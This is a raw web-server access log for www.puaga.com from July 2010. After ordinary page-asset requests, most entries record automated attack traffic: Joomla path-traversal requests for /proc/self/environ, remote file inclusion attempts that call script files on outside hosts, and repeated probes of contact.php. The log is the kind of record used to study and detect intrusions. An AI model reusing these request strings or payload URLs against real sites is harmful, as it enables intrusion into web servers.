88.233.117.28 - - [31/Jul/2010:09:32:54 -0700] "GET /style/5.style.css HTTP/1.1" 200 2407 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:54 -0700] "GET /style/pngHack.css HTTP/1.1" 200 42 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:54 -0700] "GET /style/imagehover.js HTTP/1.1" 200 1410 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:55 -0700] "GET /images/TL_Home.png HTTP/1.1" 200 5012 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:55 -0700] "GET /images/TL_Home_Hover.png HTTP/1.1" 200 5160 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:55 -0700] "GET /images/TL_AkifBar.png HTTP/1.1" 200 4614 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:55 -0700] "GET /images/TL_AkifBar_Hover.png HTTP/1.1" 200 4767 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:55 -0700] "GET /images/TL_Diger.png HTTP/1.1" 200 4637 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:55 -0700] "GET /images/TL_Diger_Hover.png HTTP/1.1" 200 4675 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:55 -0700] "GET /images/TL_Pixero_Hover.png HTTP/1.1" 200 4643 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:55 -0700] "GET /images/TL_Pixero.png HTTP/1.1" 200 4545 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:55 -0700] "GET /images/TL_Simple_Hover.png HTTP/1.1" 200 4805 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:55 -0700] "GET /images/TL_Simple.png HTTP/1.1" 200 4682 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:55 -0700] "GET /images/PageBackSwills.jpg HTTP/1.1" 200 41348 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:56 -0700] "GET /images/puaga.com_main.09482309483291.png HTTP/1.1" 200 154201 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:56 -0700] "GET /images/PuagaSubLink_38472394873298.png HTTP/1.1" 200 8153 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
88.233.117.28 - - [31/Jul/2010:09:32:56 -0700] "GET /images/PuagaSubLink_38472394873299.png HTTP/1.1" 200 33762 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:09:32:59 -0700] "POST /logs/access_100711.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:09:32:59 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:09:32:59 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:09:33:27 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:09:33:27 -0700] "POST /logs//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:09:33:29 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:09:33:29 -0700] "POST /logs//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:09:33:30 -0700] "POST /logs/access_100630.log//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:09:33:32 -0700] "POST /logs/access_100630.log//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:09:33:33 -0700] "POST /logs/access_100714.log//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:09:33:33 -0700] "POST /logs/access_100714.log//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:33:48 -0700] "GET /logs/access_100723.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:33:58 -0700] "GET /logs/access_100401.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:09:34:01 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:09:34:02 -0700] "POST /logs/access_100714.log%20%20//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:09:34:02 -0700] "POST /logs//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
195.42.120.131 - - [31/Jul/2010:09:34:10 -0700] "GET /logs/access_100420.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://un04.com/bbs/data/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
195.42.120.131 - - [31/Jul/2010:09:34:10 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://un04.com/bbs/data/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
195.42.120.131 - - [31/Jul/2010:09:34:10 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://un04.com/bbs/data/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:34:11 -0700] "GET /logs/access_100714.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:34:12 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:34:13 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:34:14 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:34:27 -0700] "GET /logs/access_100601.log///web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:34:27 -0700] "GET //web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:34:28 -0700] "GET /logs///web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:09:34:37 -0700] "GET /logs/access_100521.log//download.php?board_skin_path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:09:34:37 -0700] "GET /logs//download.php?board_skin_path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:09:34:37 -0700] "GET /download.php?board_skin_path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:34:45 -0700] "GET /logs/access_100601.log///web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
64.202.247.2 - - [31/Jul/2010:09:34:45 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:34:45 -0700] "GET //web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:34:46 -0700] "GET /logs///web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:34:48 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:34:49 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:34:49 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:34:54 -0700] "GET /logs/access_100209.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:34:54 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:34:54 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:09:35:08 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:09:35:08 -0700] "POST /logs/access_100711.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:09:35:10 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:09:35:10 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:35:13 -0700] "GET /logs/access_100601.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:35:13 -0700] "GET /logs/access_100601.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:35:14 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.810" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:35:14 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.810" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:35:14 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:35:14 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:35:35 -0700] "GET /logs/access_100515.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:09:35:39 -0700] "POST /logs/access_100704.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:35:40 -0700] "GET /logs/access_100515.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:35:41 -0700] "GET /index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:35:41 -0700] "GET /index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:35:41 -0700] "GET /logs/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:35:46 -0700] "GET /logs/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:35:46 -0700] "GET /logs/access_100518.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:35:47 -0700] "GET /logs/access_100518.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:09:36:14 -0700] "GET /logs/access_100521.log//download.php?board_skin_path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:09:36:14 -0700] "GET /download.php?board_skin_path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:09:36:14 -0700] "GET /logs//download.php?board_skin_path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.42.120.131 - - [31/Jul/2010:09:36:49 -0700] "GET /logs/access_100422.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://un04.com/bbs/data/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:36:58 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:09:37:13 -0700] "GET /logs//download.php?board_skin_path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:09:37:13 -0700] "GET /logs/access_100521.log//download.php?board_skin_path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:09:37:13 -0700] "GET /download.php?board_skin_path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:37:29 -0700] "GET /logs/access_100219.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:38:07 -0700] "GET /logs/access_100710.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:38:08 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 200 3624 "-" "libwww-perl/5.805" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:38:09 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:38:10 -0700] "GET /logs/access_100717.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:38:43 -0700] "GET /logs/access_100209.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:39:04 -0700] "GET /logs/access_100626.log///web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:39:08 -0700] "GET /logs/access_100626.log///web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:39:31 -0700] "GET /logs/access_100626.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:09:39:34 -0700] "GET /logs/access_100626.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:39:56 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:39:57 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:39:58 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:40:12 -0700] "GET /logs/access_100401.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.110.112.210 - - [31/Jul/2010:09:40:19 -0700] "POST /logs/access_100617.log%20%20//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
79.110.112.210 - - [31/Jul/2010:09:40:19 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
79.110.112.210 - - [31/Jul/2010:09:40:19 -0700] "POST /logs//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
178.162.133.106 - - [31/Jul/2010:09:40:26 -0700] "GET /logs/access_100716.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.823" "www.puaga.com"
178.162.133.106 - - [31/Jul/2010:09:40:27 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.823" "www.puaga.com"
178.162.133.106 - - [31/Jul/2010:09:40:27 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.823" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:09:40:36 -0700] "GET /logs//download.php?board_skin_path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:09:40:36 -0700] "GET /logs/access_100521.log//download.php?board_skin_path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:09:40:36 -0700] "GET /download.php?board_skin_path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
178.162.133.106 - - [31/Jul/2010:09:40:55 -0700] "GET /logs/access_100628.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.823" "www.puaga.com"
178.162.133.106 - - [31/Jul/2010:09:40:55 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.823" "www.puaga.com"
178.162.133.106 - - [31/Jul/2010:09:40:55 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.823" "www.puaga.com"
178.162.133.106 - - [31/Jul/2010:09:40:58 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.823" "www.puaga.com"
178.162.133.106 - - [31/Jul/2010:09:41:10 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.823" "www.puaga.com"
178.162.133.106 - - [31/Jul/2010:09:41:21 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=..